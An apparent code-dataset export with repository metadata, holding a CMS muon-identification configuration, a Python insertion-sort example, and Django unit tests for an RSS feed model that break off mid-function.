DepositLabel = cms.untracked.string('Cal'),
NoiseTow_EB = cms.double(0.04),
NoiseTow_EE = cms.double(0.15),
Noise_EB = cms.double(0.025),
Noise_EE = cms.double(0.1),
Noise_HB = cms.double(0.2),
Noise_HE = cms.double(0.2),
Noise_HO = cms.double(0.2),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold_E = cms.double(0.2),
Threshold_H = cms.double(0.5),
Threshold_HO = cms.double(0.5),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(1.0),
dREcalPreselection = cms.double(1.0),
dRHcal = cms.double(1.0),
dRHcalPreselection = cms.double(1.0),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
),
UseRecHitsFlag = cms.bool(False)
),
JetExtractorPSet = cms.PSet(
ComponentName = cms.string('JetExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.1),
ExcludeMuonVeto = cms.bool(True),
JetCollectionLabel = cms.InputTag("Notused"),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold = cms.double(5.0),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(0.5),
dREcalPreselection = cms.double(0.5),
dRHcal = cms.double(0.5),
dRHcalPreselection = cms.double(0.5),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
)
),
MuonCaloCompatibility = cms.PSet(
MuonTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_muons_lowPt_3_1_norm.root'),
PionTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_pions_lowPt_3_1_norm.root'),
allSiPMHO = cms.bool(False),
delta_eta = cms.double(0.02),
delta_phi = cms.double(0.02)
),
TimingFillerParameters = cms.PSet(
CSCTimingParameters = cms.PSet(
CSCStripError = cms.double(7.0),
CSCStripTimeOffset = cms.double(0.0),
CSCTimeOffset = cms.double(0.0),
CSCWireError = cms.double(8.6),
CSCWireTimeOffset = cms.double(0.0),
CSCsegments = cms.InputTag("hltCscSegments"),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(100.0),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseStripTime = cms.bool(True),
UseWireTime = cms.bool(True),
debug = cms.bool(False)
),
DTTimingParameters = cms.PSet(
DTTimeOffset = cms.double(2.7),
DTsegments = cms.InputTag("hltDt4DSegments"),
DoWireCorr = cms.bool(False),
DropTheta = cms.bool(True),
HitError = cms.double(6.0),
HitsMin = cms.int32(5),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(10000.0),
RequireBothProjections = cms.bool(False),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseSegmentT0 = cms.bool(False),
debug = cms.bool(False)
),
EcalEnergyCut = cms.double(0.4),
ErrorCSC = cms.double(7.4),
ErrorDT = cms.double(6.0),
ErrorEB = cms.double(2.085),
ErrorEE = cms.double(6.95),
UseCSC = cms.bool(True),
UseDT = cms.bool(True),
UseECAL = cms.bool(True)
),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
GEMSegmentCollectionLabel = cms.InputTag("hltGemSegments"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
ME0SegmentCollectionLabel = cms.InputTag("hltMe0Segments"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(9999.0),
dREcalPreselection = cms.double(0.05),
dRHcal = cms.double(9999.0),
dRHcalPreselection = cms.double(0.2),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(False),
useEcal = cms.bool(False),
useGEM = cms.bool(True),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useME0 = cms.bool(False),
# useME0 = cms.bool(True), ### Thiago: in the offline RECO it is false...
useMuon = cms.bool(True),
usePreshower = cms.bool(False)
),
TrackExtractorPSet = cms.PSet(
BeamSpotLabel = cms.InputTag("offlineBeamSpot"),
BeamlineOption = cms.string('BeamSpotFromEvent'),
Chi2Ndof_Max = cms.double(1e+64),
Chi2Prob_Min = cms.double(-1.0),
ComponentName = cms.string('TrackExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.01),
Diff_r = cms.double(0.1),
Diff_z = cms.double(0.2),
NHits_Min = cms.uint32(0),
Pt_Min = cms.double(-1.0),
inputTrackCollection = cms.InputTag("hltPhase2L3MuonMerged")
),
TrackerKinkFinderParameters = cms.PSet(
diagonalOnly = cms.bool(False),
usePosition = cms.bool(False)
),
addExtraSoftMuons = cms.bool(False),
arbitrateTrackerMuons = cms.bool(True),
arbitrationCleanerOptions = cms.PSet(
ClusterDPhi = cms.double(0.6),
ClusterDTheta = cms.double(0.02),
Clustering = cms.bool(True),
ME1a = cms.bool(True),
Overlap = cms.bool(True),
OverlapDPhi = cms.double(0.0786),
OverlapDTheta = cms.double(0.02)
),
debugWithTruthMatching = cms.bool(False),
ecalDepositName = cms.string('ecal'),
fillCaloCompatibility = cms.bool(False),
fillEnergy = cms.bool(False),
fillGlobalTrackQuality = cms.bool(False),
fillGlobalTrackRefits = cms.bool(False),
fillIsolation = cms.bool(False),
fillMatching = cms.bool(True),
fillTrackerKink = cms.bool(False),
globalTrackQualityInputTag = cms.InputTag(""),
hcalDepositName = cms.string('hcal'),
hoDepositName = cms.string('ho'),
inputCollectionLabels = cms.VInputTag("hltPhase2L3MuonMerged", "hltPhase2L3GlbMuon", "hltL2MuonsFromL1TkMuon:UpdatedAtVtx"),
inputCollectionTypes = cms.vstring(
'inner tracks',
'links',
'outer tracks'
),
jetDepositName = cms.string('jets'),
maxAbsDx = cms.double(3.0),
maxAbsDy = cms.double(9999.0),
maxAbsEta = cms.double(3.0),
maxAbsPullX = cms.double(4.0),
maxAbsPullY = cms.double(9999.0),
minCaloCompatibility = cms.double(0.6),
minNumberOfMatches = cms.int32(1),
minP = cms.double(0.0),
minPCaloMuon = cms.double(1000000000.0),
minPt = cms.double(2.0),
ptThresholdToFillCandidateP4WithGlobalFit = cms.double(200.0),
runArbitrationCleaner = cms.bool(False),
sigmaThresholdToFillCandidateP4WithGlobalFit = cms.double(2.0),
trackDepositName = cms.string('tracker'),
writeIsoDeposits = cms.bool(False)
)
| 43.794872 | 128 | 0.610572 | import FWCore.ParameterSet.Config as cms
hltPhase2L3MuonsNoID = cms.EDProducer("MuonIdProducer",
CaloExtractorPSet = cms.PSet(
CenterConeOnCalIntersection = cms.bool(False),
ComponentName = cms.string('CaloExtractorByAssociator'),
DR_Max = cms.double(1.0),
DR_Veto_E = cms.double(0.07),
DR_Veto_H = cms.double(0.1),
DR_Veto_HO = cms.double(0.1),
DepositInstanceLabels = cms.vstring(
'ecal',
'hcal',
'ho'
),
DepositLabel = cms.untracked.string('Cal'),
NoiseTow_EB = cms.double(0.04),
NoiseTow_EE = cms.double(0.15),
Noise_EB = cms.double(0.025),
Noise_EE = cms.double(0.1),
Noise_HB = cms.double(0.2),
Noise_HE = cms.double(0.2),
Noise_HO = cms.double(0.2),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold_E = cms.double(0.2),
Threshold_H = cms.double(0.5),
Threshold_HO = cms.double(0.5),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(1.0),
dREcalPreselection = cms.double(1.0),
dRHcal = cms.double(1.0),
dRHcalPreselection = cms.double(1.0),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
),
UseRecHitsFlag = cms.bool(False)
),
JetExtractorPSet = cms.PSet(
ComponentName = cms.string('JetExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.1),
ExcludeMuonVeto = cms.bool(True),
JetCollectionLabel = cms.InputTag("Notused"),
PrintTimeReport = cms.untracked.bool(False),
PropagatorName = cms.string('hltESPFastSteppingHelixPropagatorAny'),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(False),
UseMuonNavigation = cms.untracked.bool(False)
),
Threshold = cms.double(5.0),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(0.5),
dREcalPreselection = cms.double(0.5),
dRHcal = cms.double(0.5),
dRHcalPreselection = cms.double(0.5),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(True),
useEcal = cms.bool(False),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useMuon = cms.bool(False),
usePreshower = cms.bool(False)
)
),
MuonCaloCompatibility = cms.PSet(
MuonTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_muons_lowPt_3_1_norm.root'),
PionTemplateFileName = cms.FileInPath('RecoMuon/MuonIdentification/data/MuID_templates_pions_lowPt_3_1_norm.root'),
allSiPMHO = cms.bool(False),
delta_eta = cms.double(0.02),
delta_phi = cms.double(0.02)
),
TimingFillerParameters = cms.PSet(
CSCTimingParameters = cms.PSet(
CSCStripError = cms.double(7.0),
CSCStripTimeOffset = cms.double(0.0),
CSCTimeOffset = cms.double(0.0),
CSCWireError = cms.double(8.6),
CSCWireTimeOffset = cms.double(0.0),
CSCsegments = cms.InputTag("hltCscSegments"),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(100.0),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseStripTime = cms.bool(True),
UseWireTime = cms.bool(True),
debug = cms.bool(False)
),
DTTimingParameters = cms.PSet(
DTTimeOffset = cms.double(2.7),
DTsegments = cms.InputTag("hltDt4DSegments"),
DoWireCorr = cms.bool(False),
DropTheta = cms.bool(True),
HitError = cms.double(6.0),
HitsMin = cms.int32(5),
MatchParameters = cms.PSet(
CSCsegments = cms.InputTag("hltCscSegments"),
DTradius = cms.double(0.01),
DTsegments = cms.InputTag("hltDt4DSegments"),
TightMatchCSC = cms.bool(True),
TightMatchDT = cms.bool(False)
),
PruneCut = cms.double(10000.0),
RequireBothProjections = cms.bool(False),
ServiceParameters = cms.PSet(
Propagators = cms.untracked.vstring('hltESPFastSteppingHelixPropagatorAny'),
RPCLayers = cms.bool(True)
),
UseSegmentT0 = cms.bool(False),
debug = cms.bool(False)
),
EcalEnergyCut = cms.double(0.4),
ErrorCSC = cms.double(7.4),
ErrorDT = cms.double(6.0),
ErrorEB = cms.double(2.085),
ErrorEE = cms.double(6.95),
UseCSC = cms.bool(True),
UseDT = cms.bool(True),
UseECAL = cms.bool(True)
),
TrackAssociatorParameters = cms.PSet(
CSCSegmentCollectionLabel = cms.InputTag("hltCscSegments"),
CaloTowerCollectionLabel = cms.InputTag("Notused"),
DTRecSegment4DCollectionLabel = cms.InputTag("hltDt4DSegments"),
EBRecHitCollectionLabel = cms.InputTag("Notused"),
EERecHitCollectionLabel = cms.InputTag("Notused"),
GEMSegmentCollectionLabel = cms.InputTag("hltGemSegments"),
HBHERecHitCollectionLabel = cms.InputTag("Notused"),
HORecHitCollectionLabel = cms.InputTag("Notused"),
ME0SegmentCollectionLabel = cms.InputTag("hltMe0Segments"),
accountForTrajectoryChangeCalo = cms.bool(False),
dREcal = cms.double(9999.0),
dREcalPreselection = cms.double(0.05),
dRHcal = cms.double(9999.0),
dRHcalPreselection = cms.double(0.2),
dRMuon = cms.double(9999.0),
dRMuonPreselection = cms.double(0.2),
dRPreshowerPreselection = cms.double(0.2),
muonMaxDistanceSigmaX = cms.double(0.0),
muonMaxDistanceSigmaY = cms.double(0.0),
muonMaxDistanceX = cms.double(5.0),
muonMaxDistanceY = cms.double(5.0),
propagateAllDirections = cms.bool(True),
trajectoryUncertaintyTolerance = cms.double(-1.0),
truthMatch = cms.bool(False),
useCalo = cms.bool(False),
useEcal = cms.bool(False),
useGEM = cms.bool(True),
useHO = cms.bool(False),
useHcal = cms.bool(False),
useME0 = cms.bool(False),
# useME0 = cms.bool(True), ### Thiago: in the offline RECO it is false...
useMuon = cms.bool(True),
usePreshower = cms.bool(False)
),
TrackExtractorPSet = cms.PSet(
BeamSpotLabel = cms.InputTag("offlineBeamSpot"),
BeamlineOption = cms.string('BeamSpotFromEvent'),
Chi2Ndof_Max = cms.double(1e+64),
Chi2Prob_Min = cms.double(-1.0),
ComponentName = cms.string('TrackExtractor'),
DR_Max = cms.double(1.0),
DR_Veto = cms.double(0.01),
Diff_r = cms.double(0.1),
Diff_z = cms.double(0.2),
NHits_Min = cms.uint32(0),
Pt_Min = cms.double(-1.0),
inputTrackCollection = cms.InputTag("hltPhase2L3MuonMerged")
),
TrackerKinkFinderParameters = cms.PSet(
diagonalOnly = cms.bool(False),
usePosition = cms.bool(False)
),
addExtraSoftMuons = cms.bool(False),
arbitrateTrackerMuons = cms.bool(True),
arbitrationCleanerOptions = cms.PSet(
ClusterDPhi = cms.double(0.6),
ClusterDTheta = cms.double(0.02),
Clustering = cms.bool(True),
ME1a = cms.bool(True),
Overlap = cms.bool(True),
OverlapDPhi = cms.double(0.0786),
OverlapDTheta = cms.double(0.02)
),
debugWithTruthMatching = cms.bool(False),
ecalDepositName = cms.string('ecal'),
fillCaloCompatibility = cms.bool(False),
fillEnergy = cms.bool(False),
fillGlobalTrackQuality = cms.bool(False),
fillGlobalTrackRefits = cms.bool(False),
fillIsolation = cms.bool(False),
fillMatching = cms.bool(True),
fillTrackerKink = cms.bool(False),
globalTrackQualityInputTag = cms.InputTag(""),
hcalDepositName = cms.string('hcal'),
hoDepositName = cms.string('ho'),
inputCollectionLabels = cms.VInputTag("hltPhase2L3MuonMerged", "hltPhase2L3GlbMuon", "hltL2MuonsFromL1TkMuon:UpdatedAtVtx"),
inputCollectionTypes = cms.vstring(
'inner tracks',
'links',
'outer tracks'
),
jetDepositName = cms.string('jets'),
maxAbsDx = cms.double(3.0),
maxAbsDy = cms.double(9999.0),
maxAbsEta = cms.double(3.0),
maxAbsPullX = cms.double(4.0),
maxAbsPullY = cms.double(9999.0),
minCaloCompatibility = cms.double(0.6),
minNumberOfMatches = cms.int32(1),
minP = cms.double(0.0),
minPCaloMuon = cms.double(1000000000.0),
minPt = cms.double(2.0),
ptThresholdToFillCandidateP4WithGlobalFit = cms.double(200.0),
runArbitrationCleaner = cms.bool(False),
sigmaThresholdToFillCandidateP4WithGlobalFit = cms.double(2.0),
trackDepositName = cms.string('tracker'),
writeIsoDeposits = cms.bool(False)
)
| 0 | 0 | 0 |
932abde0780a030533a6b3666904bc58b1662fa8 | 754 | py | Python | 01. Searching & Sorting/Python files/Insertion_sort.py | Ansh-cell/Data-structure-Algorithms-using-Python | 2074bd1aece7ea95a8ae12bd3e4de8139711eba1 | [
"MIT"
] | 2 | 2021-07-06T21:27:33.000Z | 2021-08-24T14:28:34.000Z | 01. Searching & Sorting/Python files/Insertion_sort.py | Ansh-cell/Data-structure-Algorithms-using-Python | 2074bd1aece7ea95a8ae12bd3e4de8139711eba1 | [
"MIT"
] | null | null | null | 01. Searching & Sorting/Python files/Insertion_sort.py | Ansh-cell/Data-structure-Algorithms-using-Python | 2074bd1aece7ea95a8ae12bd3e4de8139711eba1 | [
"MIT"
] | null | null | null |
arr = [2, 4, 1, 2, 8, 3]
insertionSort(arr)
print(arr) | 47.125 | 108 | 0.600796 | def insertionSort(arr): # argument: (arr) --> arr = array / list
length = len(arr) # find the length of array
for i in range(1, length): # starting from 1st index till end
temp = arr[i] # store the value of ith index in temp so it can be access later
j = i - 1 # as we are starting from 1st index this j will have index of value before ith index
while (j >= 0 and arr[
j] > temp): # this will loop will run till j has index 0 and j element must be larger then temp
arr[j + 1] = arr[j] # move j element right side
j = j - 1 # take next j element from left side
arr[j + 1] = temp # add temp element to j + 1 index
arr = [2, 4, 1, 2, 8, 3]
insertionSort(arr)
print(arr) | 676 | 0 | 22 |
d5389c2ca4d0f76395925e219d955743ce469ed0 | 11,483 | py | Python | feeds/tests/test_models.py | ralphqq/rss-apifier | cd056654abf24fd178f1e5d8661cafcb3cc1236b | [
"MIT"
] | null | null | null | feeds/tests/test_models.py | ralphqq/rss-apifier | cd056654abf24fd178f1e5d8661cafcb3cc1236b | [
"MIT"
] | 5 | 2020-06-06T01:01:48.000Z | 2021-09-22T18:16:22.000Z | feeds/tests/test_models.py | ralphqq/rss-apifier | cd056654abf24fd178f1e5d8661cafcb3cc1236b | [
"MIT"
] | null | null | null | from unittest.mock import patch
from django.conf import settings
from django.db import IntegrityError
from django.test import TestCase
from feeds.tests.helpers import (
make_fake_feedparser_dict, make_feed_entries_list,
make_preprocessed_entries_list
)
from feeds.models import Entry, Feed
@patch('feeds.models.preprocess_feed_entry_item')
@patch('feeds.models.fetch_feedparser_dict')
| 38.023179 | 77 | 0.634764 | from unittest.mock import patch
from django.conf import settings
from django.db import IntegrityError
from django.test import TestCase
from feeds.tests.helpers import (
make_fake_feedparser_dict, make_feed_entries_list,
make_preprocessed_entries_list
)
from feeds.models import Entry, Feed
class FeedModelTest(TestCase):
def setUp(self):
self.feed_url = 'https://www.samplefeeds.com/rss' # fake URL
# Create and set a valid FeedParserDict object
# to be used or overridden in the tests
self.feedparser_dict = make_fake_feedparser_dict(self.feed_url)
# Patch the fetch_feedparser_dict utility function
patcher = patch(
'feeds.models.fetch_feedparser_dict',
return_value=self.feedparser_dict
)
self.mock_fetch_feedparser_dict = patcher.start()
# To ensure patch gets cleaned up during tearDown:
self.addCleanup(patcher.stop)
def test_feed_model_defaults(self):
feed = Feed()
self.assertEqual(feed.title, '')
self.assertEqual(feed.description, '')
self.assertEqual(feed.version, '')
def test_feed_save_method(self):
feed = Feed(link=self.feed_url)
feed.save()
new_feed = Feed.objects.get(link=self.feed_url)
self.assertEqual(Feed.objects.count(), 1)
self.assertEqual(
new_feed.title,
self.feedparser_dict.feed['title']
)
self.assertEqual(
new_feed.description,
self.feedparser_dict.feed['description']
)
self.assertEqual(new_feed.link, self.feed_url)
self.assertEqual(
new_feed.version,
self.feedparser_dict['version']
)
def test_create_method(self):
feed = Feed.objects.create(link=self.feed_url)
self.assertTrue(self.mock_fetch_feedparser_dict.called)
self.assertEqual(Feed.objects.count(), 1)
def test_updating_and_saving_existing_feed(self):
feed = Feed.objects.create(link=self.feed_url)
with patch.object(Feed, 'fetch_and_set_feed_details') as mock_fetch:
# Modify values for existing feed and
# test that feed initialization no longer takes place
my_feed = Feed.objects.get(link=feed.link)
my_feed.title = 'New title'
my_feed.description = 'New description'
my_feed.save()
self.assertFalse(mock_fetch.called)
# Test if changes took effect
this_feed = Feed.objects.get(link=feed.link)
self.assertEqual(this_feed.title, 'New title')
self.assertEqual(this_feed.description, 'New description')
self.assertEqual(Feed.objects.count(), 1)
def test_fetching_feed_details_method(self):
feed = Feed(link=self.feed_url) # Instantiate, not save
feed.fetch_and_set_feed_details() # initialize, nopt saved
self.assertEqual(Feed.objects.count(), 0)
self.assertEqual(feed.title, self.feedparser_dict.feed['title'])
self.assertEqual(
feed.description,
self.feedparser_dict.feed['description']
)
self.assertEqual(feed.version, self.feedparser_dict['version'])
def test_save_without_link_raises_error(self):
feed = Feed()
with self.assertRaises(TypeError):
feed.save()
self.assertEqual(Feed.objects.count(), 0)
self.assertFalse(self.mock_fetch_feedparser_dict.called)
def test_create_without_link_raises_error(self):
with self.assertRaises(TypeError):
feed = Feed.objects.create()
self.assertEqual(Feed.objects.count(), 0)
self.assertFalse(self.mock_fetch_feedparser_dict.called)
def test_duplicate_feed_url_raises_integrity_error(self):
feed = Feed.objects.create(link=self.feed_url)
with self.assertRaises(IntegrityError):
# Creating a new Feed object
# using a URL already in db
Feed.objects.create(link=self.feed_url)
def test_missing_feed_fields(self):
del self.feedparser_dict.feed['title']
del self.feedparser_dict.feed['description']
del self.feedparser_dict['version']
self.mock_fetch_feedparser_dict.return_value = self.feedparser_dict
feed = Feed.objects.create(link=self.feed_url)
self.assertEqual(feed.title, '')
self.assertEqual(feed.description, '')
self.assertEqual(feed.version, '')
def test_feed_fetching_errors_interrupts_save(self):
self.mock_fetch_feedparser_dict.side_effect = ValueError
with self.assertRaises(ValueError):
feed = Feed.objects.create(link=self.feed_url)
def test_fetching_details_without_link(self):
feed = Feed()
with self.assertRaises(TypeError):
feed.fetch_and_set_feed_details()
class EntryModelTest(TestCase):
def test_field_defaults(self):
entry = Entry.objects.create()
self.assertEqual(Entry.objects.count(), 1)
def test_back_reference(self):
# Create some feeds
feed_url1 = 'https://www.my-feeds.com/'
feed_url2 = 'https://www.my-feeds2.com/'
feed_url3 = 'https://www.my-feeds3.com/'
feed_dict1 = make_fake_feedparser_dict(feed_url1)
feed_dict2 = make_fake_feedparser_dict(feed_url2)
feed_dict3 = make_fake_feedparser_dict(feed_url3)
feed1 = None
feed2 = None
feed3 = None
with patch('feeds.models.fetch_feedparser_dict') as mock_feed:
mock_feed.side_effect = [feed_dict1, feed_dict2, feed_dict3]
feed1 = Feed.objects.create(link=feed_url1)
feed2 = Feed.objects.create(link=feed_url2)
feed3 = Feed.objects.create(link=feed_url3)
# Create an entry and assign to feeds 1 and 2
entry = Entry.objects.create()
feed1.entries.add(entry)
feed2.entries.add(entry)
self.assertEqual(entry.feeds.count(), 2)
self.assertIn(feed1, entry.feeds.all())
self.assertIn(feed2, entry.feeds.all())
self.assertNotIn(feed3, entry.feeds.all())
def test_unique_constraint_on_get_and_create(self):
link1 = 'https://www.newsfeeds.com/first.html'
link2 = 'https://www.newsfeeds.com/second.html'
# Create some parsed entries
entry1 = {
'link': link1,
'summary': 'Summary 1',
'title': 'Title 1'
}
entry2 = {
'link': link1, # Same link as entry1
'summary': 'Summary 1 [Updated]', # New summary, title
'title': 'Title 1 [Updated]'
}
entry3 = {
'link': link2,
'summary': 'Summary 3',
'title': 'Title 3'
}
# Create Entry objects
obj1 = Entry.objects.create(**entry1)
obj2, created2 = Entry.objects.get_or_create(
link=entry2['link'],
defaults={k: v for k, v in entry2.items() if k != 'link'}
)
obj3, created3 = Entry.objects.get_or_create(
link=entry3['link'],
defaults={k: v for k, v in entry3.items() if k != 'link'}
)
self.assertFalse(created2)
self.assertEqual(obj2.summary, entry1['summary'])
self.assertEqual(obj2.title, entry1['title'])
self.assertTrue(created3)
self.assertEqual(obj3.summary, entry3['summary'])
self.assertEqual(obj3.title, entry3['title'])
@patch('feeds.models.preprocess_feed_entry_item')
@patch('feeds.models.fetch_feedparser_dict')
class EntryProcessingAndSavingTest(TestCase):
def setUp(self):
# Create a feed
self.feed_url = 'https://www.my-feeds.com/'
self.total_entries = 30
self.feed_dict = make_fake_feedparser_dict(
feed_url=self.feed_url,
n_items=self.total_entries
)
self.feed = None
with patch('feeds.models.fetch_feedparser_dict') as mock_feed:
mock_feed.return_value = self.feed_dict
self.feed = Feed.objects.create(link=self.feed_url)
# Create list of processed entries
self.parsed_entries = make_preprocessed_entries_list(
n_items=self.total_entries,
feed_url=self.feed_url
)
def test_entries_processing_and_saving(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
mock_parse.side_effect = self.parsed_entries
res = self.feed.update_feed_entries()
self.assertEqual(self.feed.entries.count(), self.total_entries)
self.assertEqual(res, self.total_entries)
def test_errors_when_processing_entries(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
self.parsed_entries[2] = IntegrityError
self.parsed_entries[-1] = ValueError
mock_parse.side_effect = self.parsed_entries
res = self.feed.update_feed_entries()
self.assertEqual(self.feed.entries.count(), self.total_entries - 2)
self.assertEqual(res, self.total_entries - 2)
def test_parsing_existing_entries(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
# Save two entries
self.feed.entries.create(**self.parsed_entries[0])
self.feed.entries.create(**self.parsed_entries[-1])
# Exclude saved entries
mock_parse.side_effect = self.parsed_entries[1:-1]
res = self.feed.update_feed_entries()
self.assertEqual(res, self.total_entries - 2)
self.assertEqual(mock_parse.call_count, self.total_entries)
def test_old_entries_reached_limit(self, mock_fetch, mock_parse):
